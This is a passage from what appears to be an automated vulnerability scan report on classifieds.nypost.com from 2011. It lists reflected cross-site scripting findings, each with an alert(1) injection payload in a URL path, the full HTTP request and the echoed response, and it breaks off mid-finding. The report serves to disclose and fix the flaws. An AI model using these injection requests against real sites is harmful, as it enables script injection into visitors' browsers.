User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:20 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=38857c33b28574753cda78d14a8ace9b; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=5b560eb2679cecddb823a1e438f77f3b; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1DNDY1NTVEMjRENTBBQjM0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0MDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds sale91fcd"-alert(1)-"4468efc9463/pet/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.146. http://www.classifieds.nypost.com/sale/pet/-/-/10036 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/-/-/10036

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f1fb"-alert(1)-"e6aeb42b202 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sale5f1fb"-alert(1)-"e6aeb42b202/pet/-/-/10036 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=db3656c2d334c89d48a9aeee00a4eb5b; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=89f560fafa0fe008c7944b926fd244f7; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1CNjk0M0JBRTRENTBBQjM5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds sale5f1fb"-alert(1)-"e6aeb42b202/pet/-/-/10036","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.147. http://www.classifieds.nypost.com/sale/pet/-/-/10036 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/-/-/10036

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83116"><script>alert(1)</script>f555724feb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale83116"><script>alert(1)</script>f555724feb1/pet/-/-/10036 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=c3843b8b5645fcdd6180b66333ff6f5a; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=dfb363d6a7c622fa5c08d0a7920319b1; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FREVGRTIyQjRENTBBQjM4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/sale83116"><script>alert(1)</script>f555724feb1/pet/-/-/10036" />
...[SNIP]...

1.148. http://www.classifieds.nypost.com/sale/tickets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/tickets/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5174a"><script>alert(1)</script>66e0d334f09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale5174a"><script>alert(1)</script>66e0d334f09/tickets/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=8ca8783bcde0e3626257fd40f50ea31d; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=30a88cbede95e73839d97f2865251fc5; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1GNUI0RjY2QzRENTBBQjM5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/sale5174a"><script>alert(1)</script>66e0d334f09/tickets/" />
...[SNIP]...

1.149. http://www.classifieds.nypost.com/sale/tickets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/tickets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d0b4"-alert(1)-"053f4fbbe15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sale9d0b4"-alert(1)-"053f4fbbe15/tickets/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=3b61d0721f4fb880e9a17c2f9aa52889; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=df011aa9b8df249936f6144bc05e0903; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FNTEzRTk5NzRENTBBQjNB; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Njt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds sale9d0b4"-alert(1)-"053f4fbbe15/tickets/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.150. http://www.classifieds.nypost.com/service/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /service/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21606"-alert(1)-"33cb9a6747e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /service21606"-alert(1)-"33cb9a6747e/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=961aebc58092c07654941cb71392979f; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=5b9b87405ffdd0c0ff7ccaebb488832c; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1COUJBQTJGMzRENTBBQjNB; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Njt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds service21606"-alert(1)-"33cb9a6747e/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.151. http://www.classifieds.nypost.com/service/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /service/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d866"><script>alert(1)</script>de5810db0a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service6d866"><script>alert(1)</script>de5810db0a0/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=eaaeaef750fa18669065f73738f27ea0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=196dd52b54953fa6764c5bbe3ca1ec50; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BRkY5QTJEMjRENTBBQjM5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/service6d866"><script>alert(1)</script>de5810db0a0/" />
...[SNIP]...

1.152. http://www.classifieds.nypost.com/vehicle/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c63e6"-alert(1)-"5639a7966a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehiclec63e6"-alert(1)-"5639a7966a2/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=fe0fad65bfacf582cd36a941dbe67490; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=80adaedeb7751b407e9ec87d32a8c8c0; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FMEJBMkQxOTRENTBBQjI0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyNDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehiclec63e6"-alert(1)-"5639a7966a2/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.153. http://www.classifieds.nypost.com/vehicle/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 656a4"><script>alert(1)</script>f50e8208b9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle656a4"><script>alert(1)</script>f50e8208b9e/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=b3b8561b90fc3f030b737c9ebd7877d5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=f776fafc6849cd0dcc840f8ea95bbf82; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FRjA5ODE0QzRENTBBQjIz; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyMzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehicle656a4"><script>alert(1)</script>f50e8208b9e/" />
...[SNIP]...

1.154. http://www.classifieds.nypost.com/vehicle/boat/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/boat/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dbc5"><script>alert(1)</script>9cbc9beb40d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle5dbc5"><script>alert(1)</script>9cbc9beb40d/boat/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=9cdaa04fd4d7646363a987637fa4b753; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=4a72348e669d11d12a73b3d78040960d; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1GQjE3RDUzQzRENTBBQjI4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/vehicle5dbc5"><script>alert(1)</script>9cbc9beb40d/boat/" />
...[SNIP]...

1.155. http://www.classifieds.nypost.com/vehicle/boat/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/boat/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f232"-alert(1)-"4ea6d28509e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehicle1f232"-alert(1)-"4ea6d28509e/boat/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=36e66ec1ebc2e0e32c4eb13444e459b5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=0d8c04fbb2d94f12fe43bf23ba8956e2; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1CN0E1NENBRjRENTBBQjI5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyOTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehicle1f232"-alert(1)-"4ea6d28509e/boat/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.156. http://www.classifieds.nypost.com/vehicle/commercial_truck/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/commercial_truck/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ef8b"-alert(1)-"57866654706 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /vehicle8ef8b"-alert(1)-"57866654706/commercial_truck/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=b52000f6d57e8b787a309d54bd570139; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=3ecf6510eb226343b6ae39574703867a; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1ENzBEQTVDMjRENTBBQjI2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyNjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds vehicle8ef8b"-alert(1)-"57866654706/commercial_truck/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.157. http://www.classifieds.nypost.com/vehicle/commercial_truck/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/commercial_truck/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc8e1"><script>alert(1)</script>f52bfa6af88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehiclebc8e1"><script>alert(1)</script>f52bfa6af88/commercial_truck/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=9f0624363c8b15dccf611d750c2be872; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=686b94be6bdc27b9ceab2db9011119c9; path=/; domain=.classifieds.nypost.com
